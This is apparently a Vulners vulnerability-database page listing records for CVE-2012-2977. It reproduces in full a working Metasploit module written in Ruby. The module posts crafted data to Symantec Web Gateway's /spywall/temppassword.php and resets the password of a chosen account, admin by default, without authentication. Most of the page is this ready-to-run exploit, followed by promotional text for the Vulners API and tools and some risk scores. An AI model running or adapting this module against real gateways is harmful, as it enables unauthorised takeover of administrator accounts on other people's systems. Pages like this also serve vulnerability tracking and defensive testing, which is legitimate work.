Vulners
Lucene search
Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change (MSF) | 21 Aug 201200:00 | – | zdt |
 | CVE-2012-2977 | 21 Aug 201200:00 | – | circl |
 | CVE-2012-2977 | 23 Jul 201217:00 | – | cve |
 | CVE-2012-2977 | 23 Jul 201217:00 | – | cvelist |
 | EUVD-2012-2955 | 7 Oct 202500:30 | – | euvd |
 | Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit) | 21 Aug 201200:00 | – | exploitpack |
 | CVE-2012-2977 | 23 Jul 201217:55 | – | nvd |
 | Symantec Web Gateway Password Change Security Bypass Vulnerability | 22 Aug 201200:00 | – | openvas |
| Symantec Web Gateway Multiple Vulnerabilities | 24 Jul 201200:00 | – | openvas |
 | Symantec Web Gateway 5.0.3.18 Password Change | 22 Aug 201200:00 | – | packetstorm |
10
##
# @_Kc57
# Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",
'Description' => %q{
This module will change the password for the specified account on a Symantec Web Gatewaye server.
},
'License' => MSF_LICENSE,
'Version' => "$Revision: 0 $",
'Author' =>
[
'Kc57',
],
'References' =>
[
[ 'CVE', '2012-2977' ],
[ 'OSVDB', '0' ],
[ 'BID', '54430' ],
[ 'URL', 'https://www.securityfocus.com/bid/54430' ],
],
'DisclosureDate' => "Jul 23 2012" ))
register_options(
[
Opt::RPORT(80),
OptString.new('USER', [ true, 'The password to reset to', 'admin']),
OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
], self.class)
end
def run
print_status("Attempting to connect to https://#{rhost}/spywall/temppassword.php to reset password")
res = send_request_raw(
{
'method' => 'POST',
'uri' => '/spywall/temppassword.php',
}, 25)
#check to see if we get HTTP OK
if (res.code == 200)
print_status("Okay, Got an HTTP 200 (okay) code. Checking if exploitable")
else
print_error("Did not get HTTP 200, URL was not found. Exiting!")
return
end
#Check to if the temppassword.php page loads or if we are redirected to the login page
if (res.body.match(/Please Select a New Password/i))
print_status("Server is vulnerable!")
else
print_error("Target doesn't seem to be vulnerable!")
return
end
print_status("Attempting to exploit password change vulnerability on #{rhost}")
print_status("Attempting to reset #{datastore['USER']} password to #{datastore['PASSWORD']}")
data = 'target=executive_summary.php'
data << '&USERNAME=' + datastore['USER']
data << '&password=' + datastore['PASSWORD']
data << '&password2=' + datastore['PASSWORD']
data << '&Save=Save'
res = send_request_cgi(
{
'method' => 'POST',
'uri' => '/spywall/temppassword.php',
'data' => data,
}, 25)
if res.code == 200
if (res.body.match(/Thank you/i))
print_status("Password reset was successful!\n")
else
print_error("Password reset failed! User '#{datastore['USER']}' may not exist.\n")
end
else
print_error("Password reset failed!")
end
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
21 Aug 2012 00:00Current
7High risk
Vulners AI Score7
CVSS 25
EPSS0.161